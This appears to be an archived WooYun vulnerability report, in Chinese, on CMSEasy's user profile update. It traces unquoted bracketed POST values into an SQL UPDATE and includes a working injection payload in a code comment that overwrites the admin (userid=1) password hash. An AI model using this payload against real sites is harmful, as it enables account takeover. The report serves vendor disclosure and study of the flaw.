乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-20: 细节已通知厂商并且等待厂商处理中 2013-10-20: 厂商已经确认,细节仅向厂商公开 2013-10-23: 细节向第三方安全合作伙伴开放 2013-12-14: 细节向核心白帽子及相关领域专家公开 2013-12-24: 细节向普通白帽子公开 2014-01-03: 细节向实习白帽子公开 2014-01-18: 细节向公众公开
其实我是来刷普通白帽子的...cmseasy对GET过滤的比较严,对于POST基本没有过滤,各种跨站各种包含。
lib/default/user_act.php
function edit_action() { if(front::post('submit')) { unset(front::$post['groupid']); unset(front::$post['powerlist']); foreach (front::$post as $k => $v){ if(is_array($v) && !empty($v)){ front::$post[$k] = implode(',', $v); } front::check_type(front::post($k), 'safe'); //is_safe自定义函数对其无影响,跟进0x01 } $this->_user->rec_update(front::$post,'userid='.session::get('userid')); //问题出在这儿,跟进0x02 front::flash(lang('修改资料成功!')); front::redirect(url::create('user/index')); } $this->view->data=$this->view->user; }
lib/tool/front_class.php 0x01
static function check_type($var,$type='number') { $func="is_$type"; if (!$func($var)) { header("HTTP/1.0 404 Not Found"); exit('PAGE NOT FOUND!'); } }function is_safe($string) { if(!$string) return true; if(false !== strpos($string,'<script')){ return false; } if(false !== strpos($string,'vbscript:')){ return false; } if(false !== strpos($string,'javascript:')){ return false; } /*if ($string <>addslashes($string)) return false; else*/ return true;}
lib/inc/table.php 0x02
function rec_update($row,$where) { $tbname=$this->name; $sql=$this->sql_update($tbname,$row,$where); //echo $sql."<br>"; return $this->query_unbuffered($sql);}function sql_update($tbname,$row,$where) { $sqlud=''; if (is_string($row)) $sqlud=$row.' '; else foreach ($row as $key=>$value) { if (in_array($key,explode(',',$this->getcolslist()))) { $value=$value; if (preg_match('/^\[(.*)\]$/',$value,$match)) $sqlud .= "`$key`"."= ".$match[1].","; //没加引号。只要匹配上面的正则就行,中括号里面输入注入语句就行。//[1,password=0x6531306164633339343962613539616262653536653035376632306638383365 where userid=1%23]//UPDATE `cmseasy_user` SET `nickname`= 1,password=0x6531306164633339343962613539616262653536653035376632306638383365 where userid=1 elseif ($value === "") $sqlud .= "`$key`= NULL, "; else $sqlud .= "`$key`"."= '".$value."',"; } } $sqlud=rtrim($sqlud); $sqlud=rtrim($sqlud,','); $this->condition($where); $sql="UPDATE `".$tbname."` SET ".$sqlud." WHERE ".$where; return $sql; }
求包养。。。
危害等级:高
漏洞Rank:15
确认时间:2013-10-20 23:00
马上处理,感谢
暂无